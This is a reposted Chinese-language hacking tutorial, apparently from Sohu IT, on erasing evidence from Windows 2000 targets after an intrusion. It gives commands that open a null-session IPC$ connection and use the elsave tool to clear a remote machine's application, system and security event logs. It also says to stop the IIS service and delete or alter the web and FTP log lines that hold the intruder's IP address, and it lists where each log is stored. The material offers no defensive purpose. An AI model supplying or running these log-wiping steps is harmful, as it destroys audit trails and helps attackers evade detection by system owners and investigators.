[转载]如何用elsave清除日志

信息来源：搜狐IT

　　经过一段安全技术的学习，在学习中使用比较多的工具。今天，我把自己一些使用的经验总结一些，把一些比较常用的黑客工具的使用方法写出来，希望给大家一些帮助！

　　1.小榕的elsave清除日志的使用:

　　先用ipc$管道进行连接:net use \\ip\ipc$ "password" /user:""

　　清除目标系统的应用程序日志:

　　elsave -s \\ip -l "application" -C

　　清除目标系统的系统日志:

　　elsave -s \\ip -l "system"" -C

　　清除目标系统的安全日志:

　　elsave -s \\ip -l "security" -C

　　2.windows2000日志的清除:

　　www的日志一般都在%winsystem%\system32\logfiles\w3svc1下面，包括www日志和ftp日志，一般先停止www服务后在删除:net stop w3svc，然后将你留下了ip的日志删除，你也可以修改日志.wwww日志在w3svc1下面，ftp日志在msftpsvc下面，每个日志都是以:exXXXXXX.log为命名的，xxxxxx代表日期.

　　win2000中的其他一些日志:

　　安全日志:%winsystem%\system32\config\Secevent.evt

　　应用程序日志:%winsystem%\system32\config\AppEvent.evt

　　系统日志:%winsystem%\system32\config\SysEvent.evt

　　IIS的FTP日志:%winsystem%\system32\logfiles\msftpsvc1\，默认每天一个日志

　　IIS的www日志:%winsystem%\system32\logfiles\w3svc1\ 默认每天一个日志

　　Scheduler服务日志:%winsystem%\schedlgu.txt